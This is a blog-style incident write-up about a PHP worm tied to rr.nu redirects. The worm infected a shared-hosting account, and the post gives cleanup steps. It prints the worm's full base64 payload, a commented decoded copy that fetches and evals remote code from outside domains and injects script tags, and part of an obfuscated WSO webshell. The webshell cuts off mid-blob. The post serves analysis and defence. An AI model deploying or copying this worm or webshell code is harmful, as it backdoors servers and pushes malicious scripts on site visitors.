The rr.nu PHP Worm and Encrypted Webshells: Dyslexic Mayans Want to Sell You Cialis

Problems with preg_replace("/.*/e","\x65\x76 , $_8b7b="\x63\x72\, eval(base64_ hacks, and those damn rr.nu domain redirects

My shared host account got hacked-TFU last Monday. After looking a little closer it became clear that there had been more than one break in. Apparently my account also got hacked last November, three times in December (twice by the same hacker!) and once in January too, so for the past few months my server has had a back door like Dennis the Menace's hanging pajama flap.

Monday's attack was the one that finally got my attention because its impact was so widespread; this particular worm grabs every php script it can get a hold of and attaches a long eval(base64_decode statement to the header. The damage was spread across three separate domains and corrupted every php file in my Gallery2, PHPBB, Joomla and Wiki installations. Only seven files were left untouched; five of those had been placed in my domain tree by other hackers, and the other two were the entry point through which the worm script got executed. A considerate and genteel group, these guys, that in the course of clobbering my site the hackers they were nice enough not to step on each others' toes.

So, what does eval(base64 code do? It adds this extra line of javascript to each page:

 <script src="http://sweepstakesandcontestsdo.com/pmg.php?dr=1"></script> 

And here is the offending php code that got meanly inserted throughout my account:

<?php /**/eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJF9TRVJWRVJbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9ubyddPTE7ICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICBmdW5jdGlvbiBnZXRfdGRzXzc3NygkdXJsKXskY29udGVudD0iIjskY29udGVudD1AdHJ5Y3VybF83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZpbGVfNzc3KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmb3Blbl83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZzb2Nrb3Blbl83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeXNvY2tldF83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7cmV0dXJuICcnO30gIGZ1bmN0aW9uIHRyeWN1cmxfNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0Jyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGNoID0gY3VybF9pbml0ICgpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7Y3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOyRyZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7Y3VybF9jbG9zZSgkY2gpO2lmICgkcmVzdWx0PT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRyZXN1bHQ7fSAgZnVuY3Rpb24gdHJ5ZmlsZV83NzcoJHVybCl7aWYoZnVuY3Rpb25fZXhpc3RzKCdmaWxlJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGluYz1AZmlsZSgkdXJsKTskYnVmPUBpbXBsb2RlKCcnLCRpbmMpO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdHJ5Zm9wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZm9wZW4nKT09PWZhbHNlKXJldHVybiBmYWxzZTskYnVmPScnOyRmPUBmb3BlbigkdXJsLCdyJyk7aWYgKCRmKXt3aGlsZSghZmVvZigkZikpeyRidWYuPWZyZWFkKCRmLDEwMDAwKTt9ZmNsb3NlKCRmKTt9ZWxzZSByZXR1cm4gZmFsc2U7aWYgKCRidWY9PSIiKXJldHVybiBmYWxzZTtyZXR1cm4gJGJ1Zjt9ICBmdW5jdGlvbiB0cnlmc29ja29wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZnNvY2tvcGVuJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JHA9QHBhcnNlX3VybCgkdXJsKTskaG9zdD0kcFsnaG9zdCddOyR1cmk9JHBbJ3BhdGgnXS4nPycuJHBbJ3F1ZXJ5J107JGY9QGZzb2Nrb3BlbigkaG9zdCw4MCwkZXJybm8sICRlcnJzdHIsMzApO2lmKCEkZilyZXR1cm4gZmFsc2U7JHJlcXVlc3QgPSJHRVQgJHVyaSBIVFRQLzEuMFxuIjskcmVxdWVzdC49Ikhvc3Q6ICRob3N0XG5cbiI7ZndyaXRlKCRmLCRyZXF1ZXN0KTskYnVmPScnO3doaWxlKCFmZW9mKCRmKSl7JGJ1Zi49ZnJlYWQoJGYsMTAwMDApO31mY2xvc2UoJGYpO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7bGlzdCgkbSwkYnVmKT1leHBsb2RlKGNocigxMykuY2hyKDEwKS5jaHIoMTMpLmNocigxMCksJGJ1Zik7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdHJ5c29ja2V0Xzc3NygkdXJsKXtpZihmdW5jdGlvbl9leGlzdHMoJ3NvY2tldF9jcmVhdGUnKT09PWZhbHNlKXJldHVybiBmYWxzZTskcD1AcGFyc2VfdXJsKCR1cmwpOyRob3N0PSRwWydob3N0J107JHVyaT0kcFsncGF0aCddLic/Jy4kcFsncXVlcnknXTskaXAxPUBnZXRob3N0YnluYW1lKCRob3N0KTskaXAyPUBsb25nMmlwKEBpcDJsb25nKCRpcDEpKTsgaWYgKCRpcDEhPSRpcDIpcmV0dXJuIGZhbHNlOyRzb2NrPUBzb2NrZXRfY3JlYXRlKEFGX0lORVQsU09DS19TVFJFQU0sU09MX1RDUCk7aWYgKCFAc29ja2V0X2Nvbm5lY3QoJHNvY2ssJGlwMSw4MCkpe0Bzb2NrZXRfY2xvc2UoJHNvY2spO3JldHVybiBmYWxzZTt9JHJlcXVlc3QgPSJHRVQgJHVyaSBIVFRQLzEuMFxuIjskcmVxdWVzdC49Ikhvc3Q6ICRob3N0XG5cbiI7c29ja2V0X3dyaXRlKCRzb2NrLCRyZXF1ZXN0KTskYnVmPScnO3doaWxlKCR0PXNvY2tldF9yZWFkKCRzb2NrLDEwMDAwKSl7JGJ1Zi49JHQ7fUBzb2NrZXRfY2xvc2UoJHNvY2spO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7bGlzdCgkbSwkYnVmKT1leHBsb2RlKGNocigxMykuY2hyKDEwKS5jaHIoMTMpLmNocigxMCksJGJ1Zik7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdXBkYXRlX3Rkc19maWxlXzc3NygkdGRzZmlsZSl7JGFjdHVhbDE9JF9TRVJWRVJbJ3NfYTEnXTskYWN0dWFsMj0kX1NFUlZFUlsnc19hMiddOyR2YWw9Z2V0X3Rkc183NzcoJGFjdHVhbDEpO2lmICgkdmFsPT0iIikkdmFsPWdldF90ZHNfNzc3KCRhY3R1YWwyKTskZj1AZm9wZW4oJHRkc2ZpbGUsInciKTtpZiAoJGYpe0Bmd3JpdGUoJGYsJHZhbCk7QGZjbG9zZSgkZik7fWlmIChzdHJzdHIoJHZhbCwifHx8Q09ERXx8fCIpKXtsaXN0KCR2YWwsJGNvZGUpPWV4cGxvZGUoInx8fENPREV8fHwiLCR2YWwpO2V2YWwoYmFzZTY0X2RlY29kZSgkY29kZSkpO31yZXR1cm4gJHZhbDt9ICBmdW5jdGlvbiBnZXRfYWN0dWFsX3Rkc183NzcoKXskZGVmYXVsdGRvbWFpbj0kX1NFUlZFUlsnc19kMSddOyRkaXI9JF9TRVJWRVJbJ3NfcDEnXTskdGRzZmlsZT0kZGlyLiJsb2cxLnR4dCI7aWYgKEBmaWxlX2V4aXN0cygkdGRzZmlsZSkpeyRtdGltZT1AZmlsZW10aW1lKCR0ZHNmaWxlKTskY3RpbWU9dGltZSgpLSRtdGltZTtpZiAoJGN0aW1lPiRfU0VSVkVSWydzX3QxJ10peyRjb250ZW50PXVwZGF0ZV90ZHNfZmlsZV83NzcoJHRkc2ZpbGUpO31lbHNleyRjb250ZW50PUBmaWxlX2dldF9jb250ZW50cygkdGRzZmlsZSk7fX1lbHNleyRjb250ZW50PXVwZGF0ZV90ZHNfZmlsZV83NzcoJHRkc2ZpbGUpO30kdGRzPUBleHBsb2RlKCJcbiIsJGNvbnRlbnQpOyRjPUBjb3VudCgkdGRzKSswOyR1cmw9JGRlZmF1bHRkb21haW47aWYgKCRjPjEpeyR1cmw9dHJpbSgkdGRzW210X3JhbmQoMCwkYy0yKV0pO31yZXR1cm4gJHVybDt9ICBmdW5jdGlvbiBpc19tYWNfNzc3KCR1YSl7JG1hYz0wO2lmIChzdHJpc3RyKCR1YSwibWFjIil8fHN0cmlzdHIoJHVhLCJzYWZhcmkiKSlpZiAoKCFzdHJpc3RyKCR1YSwid2luZG93cyIpKSYmKCFzdHJpc3RyKCR1YSwiaXBob25lIikpKSRtYWM9MTtyZXR1cm4gJG1hYzt9ICBmdW5jdGlvbiBpc19tc2llXzc3NygkdWEpeyRtc2llPTA7aWYgKHN0cmlzdHIoJHVhLCJNU0lFIDYiKXx8c3RyaXN0cigkdWEsIk1TSUUgNyIpfHxzdHJpc3RyKCR1YSwiTVNJRSA4Iil8fHN0cmlzdHIoJHVhLCJNU0lFIDkiKSkkbXNpZT0xO3JldHVybiAkbXNpZTt9ICAgIGZ1bmN0aW9uIHNldHVwX2dsb2JhbHNfNzc3KCl7JHJ6PSRfU0VSVkVSWyJET0NVTUVOVF9ST09UIl0uIi8ubG9ncy8iOyRtej0iL3RtcC8iO2lmICghaXNfZGlyKCRyeikpe0Bta2RpcigkcnopO2lmIChpc19kaXIoJHJ6KSl7JG16PSRyejt9ZWxzZXskcno9JF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdLiIvLmxvZ3MvIjtpZiAoIWlzX2RpcigkcnopKXtAbWtkaXIoJHJ6KTtpZiAoaXNfZGlyKCRyeikpeyRtej0kcno7fX1lbHNleyRtej0kcno7fX19ZWxzZXskbXo9JHJ6O30kYm90PTA7JHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTtpZiAoc3RyaXN0cigkdWEsIm1zbmJvdCIpfHxzdHJpc3RyKCR1YSwiWWFob28iKSkkYm90PTE7aWYgKHN0cmlzdHIoJHVhLCJiaW5nYm90Iil8fHN0cmlzdHIoJHVhLCJnb29nbGUiKSkkYm90PTE7JG1zaWU9MDtpZiAoaXNfbXNpZV83NzcoJHVhKSkkbXNpZT0xOyRtYWM9MDtpZiAoaXNfbWFjXzc3NygkdWEpKSRtYWM9MTtpZiAoKCRtc2llPT0wKSYmKCRtYWM9PTApKSRib3Q9MTsgIGdsb2JhbCAkX1NFUlZFUjsgICAgJF9TRVJWRVJbJ3NfcDEnXT0kbXo7ICAkX1NFUlZFUlsnc19iMSddPSRib3Q7ICAkX1NFUlZFUlsnc190MSddPTEyMDA7ICAkX1NFUlZFUlsnc19kMSddPSJodHRwOi8vc3dlZXBzdGFrZXNhbmRjb250ZXN0c2RvLmNvbS8iOyAgJGQ9Jz9kPScudXJsZW5jb2RlKCRfU0VSVkVSWyJIVFRQX0hPU1QiXSkuIiZwPSIudXJsZW5jb2RlKCRfU0VSVkVSWyJQSFBfU0VMRiJdKS4iJmE9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKTsgICRfU0VSVkVSWydzX2ExJ109J2h0dHA6Ly93d3cubGlseXBvcGhpbHlwb3AuY29tL2dfbG9hZC5waHAnLiRkOyAgJF9TRVJWRVJbJ3NfYTInXT0naHR0cDovL3d3dy5sb2x5cG9waG9seXBvcC5jb20vZ19sb2FkLnBocCcuJGQ7ICAkX1NFUlZFUlsnc19zY3JpcHQnXT0icG1nLnBocD9kcj0xIjsgIH0gICAgICBzZXR1cF9nbG9iYWxzXzc3NygpOyAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnbWxfNzc3JykpeyAgZnVuY3Rpb24gZ21sXzc3NygpeyAgICAkcl9zdHJpbmdfNzc3PScnOyAgaWYgKCRfU0VSVkVSWydzX2IxJ109PTApJHJfc3RyaW5nXzc3Nz0nPHNjcmlwdCBzcmM9IicuZ2V0X2FjdHVhbF90ZHNfNzc3KCkuJF9TRVJWRVJbJ3Nfc2NyaXB0J10uJyI+PC9zY3JpcHQ+JzsgIHJldHVybiAkcl9zdHJpbmdfNzc3OyAgfSAgfSAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlaXQnKSl7ICBmdW5jdGlvbiBnemRlY29kZWl0KCRkZWNvZGUpeyAgJHQ9QG9yZChAc3Vic3RyKCRkZWNvZGUsMywxKSk7ICAkc3RhcnQ9MTA7ICAkdj0wOyAgaWYoJHQmNCl7ICAkc3RyPUB1bnBhY2soJ3YnLHN1YnN0cigkZGVjb2RlLDEwLDIpKTsgICRzdHI9JHN0clsxXTsgICRzdGFydCs9Miskc3RyOyAgfSAgaWYoJHQmOCl7ICAkc3RhcnQ9QHN0cnBvcygkZGVjb2RlLGNocigwKSwkc3RhcnQpKzE7ICB9ICBpZigkdCYxNil7ICAkc3RhcnQ9QHN0cnBvcygkZGVjb2RlLGNocigwKSwkc3RhcnQpKzE7ICB9ICBpZigkdCYyKXsgICRzdGFydCs9MjsgIH0gICRyZXQ9QGd6aW5mbGF0ZShAc3Vic3RyKCRkZWNvZGUsJHN0YXJ0KSk7ICBpZigkcmV0PT09RkFMU0UpeyAgJHJldD0kZGVjb2RlOyAgfSAgcmV0dXJuICRyZXQ7ICB9ICB9ICBmdW5jdGlvbiBtcm9iaCgkY29udGVudCl7ICBASGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAkZGVjb2RlZF9jb250ZW50PWd6ZGVjb2RlaXQoJGNvbnRlbnQpOyAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkZGVjb2RlZF9jb250ZW50KSl7ICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWxfNzc3KCkuIlxuIi4nJDEnLCRkZWNvZGVkX2NvbnRlbnQpOyAgfWVsc2V7ICByZXR1cm4gJGRlY29kZWRfY29udGVudC5nbWxfNzc3KCk7ICB9ICB9ICBvYl9zdGFydCgnbXJvYmgnKTsgIH0gIH0="));?>

The code is an illegible jumble because it's encoded in base64. You can see an unjumbled version in your browser by changing the first "eval" to "print".

Here is a base64 decoded version, with my comments as to what the worm does:

<?php # This worm depends on ob_start() to intercept the corrupted page's php output. It then inserts a # javascript src request to seek, from a different, already corrupted server, a list of other servers # subdomains (presumably members of the same bot-net base) and potentially malicious php code. It # requires ob_start() and so won't execute without it. if(function_exists('ob_start')&&!isset($_SERVER['mr_no'])){ $_SERVER['mr_no']=1; if(!function_exists('mrobh')){ # get_tds_777() phones back to an already infected server to obtain a longer list of # of already infected sub-domains such as http://ixeld52erlya.rr.nu/, http://ile68depa.rr.nu/, etc. # While requesting the long list, the worm reports back via $url the worm's current location # (ie the path and filename of the infected page) and the user's browser type. To insure maximum portability # across different server set ups, get_tds_777() employs five different file retrieval protocols (curl, # file, fopen, fsockopen and socket_create). function get_tds_777($url){ $content=""; $content=@trycurl_777($url); if($content!==false)return $content; $content=@tryfile_777($url); if($content!==false)return $content; $content=@tryfopen_777($url); if($content!==false)return $content; $content=@tryfsockopen_777($url); if($content!==false)return $content; $content=@trysocket_777($url); if($content!==false)return $content; return ''; } function trycurl_777($url){ if(function_exists('curl_init')===false)return false; $ch = curl_init (); curl_setopt ($ch, CURLOPT_URL,$url); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_TIMEOUT, 5); curl_setopt ($ch, CURLOPT_HEADER, 0); $result = curl_exec ($ch); curl_close($ch); if ($result=="")return false; return $result; } function tryfile_777($url){ if(function_exists('file')===false)return false; $inc=@file($url); $buf=@implode('',$inc); if ($buf=="")return false; return $buf; } function tryfopen_777($url){ if(function_exists('fopen')===false)return false; $buf=''; $f=@fopen($url,'r'); if ($f){ while(!feof($f)){ $buf.=fread($f,10000); } fclose($f); } else return false; if ($buf=="")return false; return $buf; } function tryfsockopen_777($url){ if(function_exists('fsockopen')===false)return false; $p=@parse_url($url); $host=$p['host']; $uri=$p['path'].'?'.$p['query']; $f=@fsockopen($host,80,$errno, $errstr,30); if(!$f)return false; $request ="GET $uri HTTP/1.0\n"; $request.="Host: $host\n\n"; fwrite($f,$request); $buf=''; while(!feof($f)){ $buf.=fread($f,10000); } fclose($f); if ($buf=="")return false; list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf); return $buf; } function trysocket_777($url){ if(function_exists('socket_create')===false)return false; $p=@parse_url($url); $host=$p['host']; $uri=$p['path'].'?'.$p['query']; $ip1=@gethostbyname($host); $ip2=@long2ip(@ip2long($ip1)); if ($ip1!=$ip2)return false; $sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP); if (!@socket_connect($sock,$ip1,80)){ @socket_close($sock); return false; } $request ="GET $uri HTTP/1.0\n"; $request.="Host: $host\n\n"; socket_write($sock,$request); $buf=''; while($t=socket_read($sock,10000)){ $buf.=$t; } @socket_close($sock); if ($buf=="")return false; list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf); return $buf; } # update_tds_file() takes the long list of compromised (or malicious) servers # from get_tds_77 (above) and writes them to your local server, probably at # http://yoursite.com/.logs/log1.txt. If anyone has visited one of your # compromised pages, you'll find a list of compromised servers there! function update_tds_file_777($tdsfile){ $actual1=$_SERVER['s_a1']; $actual2=$_SERVER['s_a2']; $val=get_tds_777($actual1); if ($val=="")$val=get_tds_777($actual2); $f=@fopen($tdsfile,"w"); if ($f){ @fwrite($f,$val); @fclose($f); } # This is the part where things can get ugly. If there is malicious (or benign) # code included with the list of servers (above), the worm executes that code # here. if (strstr($val,"|||CODE|||")){ list($val,$code)=explode("|||CODE|||",$val); eval(base64_decode($code)); } return $val; } function get_actual_tds_777(){ $defaultdomain=$_SERVER['s_d1']; $dir=$_SERVER['s_p1']; $tdsfile=$dir."log1.txt"; if (@file_exists($tdsfile)){ $mtime=@filemtime($tdsfile); $ctime=time()-$mtime; if ($ctime>$_SERVER['s_t1']){ $content=update_tds_file_777($tdsfile); } else{ $content=@file_get_contents($tdsfile); } } else{ $content=update_tds_file_777($tdsfile); } $tds=@explode("\n",$content); $c=@count($tds)+0; $url=$defaultdomain; if ($c>1){ $url=trim($tds[mt_rand(0,$c-2)]); } return $url; } # With is_mac() and is_mie() the worm verifies the type of user browser. function is_mac_777($ua){ $mac=0; if (stristr($ua,"mac")||stristr($ua,"safari"))if ((!stristr($ua,"windows"))&&(!stristr($ua,"iphone")))$mac=1; return $mac; } function is_msie_777($ua){ $msie=0; if (stristr($ua,"MSIE 6")||stristr($ua,"MSIE 7")||stristr($ua,"MSIE 8")||stristr($ua,"MSIE 9"))$msie=1; return $msie; } function setup_globals_777(){ $rz=$_SERVER["DOCUMENT_ROOT"]."/.logs/"; $mz="/tmp/"; if (!is_dir($rz)){ @mkdir($rz); if (is_dir($rz)){ $mz=$rz; } else{ $rz=$_SERVER["SCRIPT_FILENAME"]."/.logs/"; if (!is_dir($rz)){ @mkdir($rz); if (is_dir($rz)){ $mz=$rz; } } else{ $mz=$rz; } } } else{ $mz=$rz; } $bot=0; $ua=$_SERVER['HTTP_USER_AGENT']; # The worm checks $_SERVER['HTTP_USER_AGENT'] to verify that the visitor isn't a search bot. # In the presence of MSN, Yahoo, Google and Bing, no javascript is injected, presumably because # those bots would then block or take other action against the servers this worm phones home to. if (stristr($ua,"msnbot")||stristr($ua,"Yahoo"))$bot=1; if (stristr($ua,"bingbot")||stristr($ua,"google"))$bot=1; $msie=0; if (is_msie_777($ua))$msie=1; $mac=0; if (is_mac_777($ua))$mac=1; if (($msie==0)&&($mac==0))$bot=1; global $_SERVER; $_SERVER['s_p1']=$mz; $_SERVER['s_b1']=$bot; $_SERVER['s_t1']=1200; $_SERVER['s_d1']="http://sweepstakesandcontestsdo.com/"; $d='?d='.urlencode($_SERVER["HTTP_HOST"])."&p=".urlencode($_SERVER["PHP_SELF"])."&a=".urlencode($_SERVER["HTTP_USER_AGENT"]); $_SERVER['s_a1']='http://www.lilypophilypop.com/g_load.php'.$d; $_SERVER['s_a2']='http://www.lolypopholypop.com/g_load.php'.$d; $_SERVER['s_script']="nl.php?p=d"; } setup_globals_777(); if(!function_exists('gml_777')){ function gml_777(){ $r_string_777=''; if ($_SERVER['s_b1']==0)$r_string_777='<script src="'.get_actual_tds_777().$_SERVER['s_script'].'"></script>'; return $r_string_777; } } if(!function_exists('gzdecodeit')){ function gzdecodeit($decode){ $t=@ord(@substr($decode,3,1)); $start=10; $v=0; if($t&4){ $str=@unpack('v',substr($decode,10,2)); $str=$str[1]; $start+=2+$str; } if($t&8){ $start=@strpos($decode,chr(0),$start)+1; } if($t&16){ $start=@strpos($decode,chr(0),$start)+1; } if($t&2){ $start+=2; } $ret=@gzinflate(@substr($decode,$start)); if($ret===FALSE){ $ret=$decode; } return $ret; } } function mrobh($content){ @Header('Content-Encoding: none'); $decoded_content=gzdecodeit($content); if(preg_match('/\<\/body/si',$decoded_content)){ return preg_replace('/(\<\/body[^\>]*\>)/si',gml_777()."\n".'$1',$decoded_content); } else{ return $decoded_content.gml_777(); } } ob_start('mrobh'); } } ?>


Cleaning the Mess

The first thing to do: to button up your pajamas. Here's how you find your open, world writeable directories, and to document those in a file:

find . -type d -perm -o=w > openbackdoors.txt

Run that command in your home directory. You'll want the file for later reference; it can be viewed with:

more ~/openbackdoors.txt

Then close those directories to world-write access:

find . -type d -perm -o=w -print -exec chmod 770 {} \;

Using your openbackdoors.txt log, go back and scrutinize *all* the files in those directories. I found three types of POST injection points; two were different obfuscations of the WSO webshell, and another looked to be a less sophisticated access portal. Even after changing directory permissions those files leave the whole system accessible and vulnerable, a sort of backdoor doorstop if you will.


Here is the first version of the webshell:

<?php $auth_pass = "feb08202ff51a0e8f78d49bbd24c2618"; $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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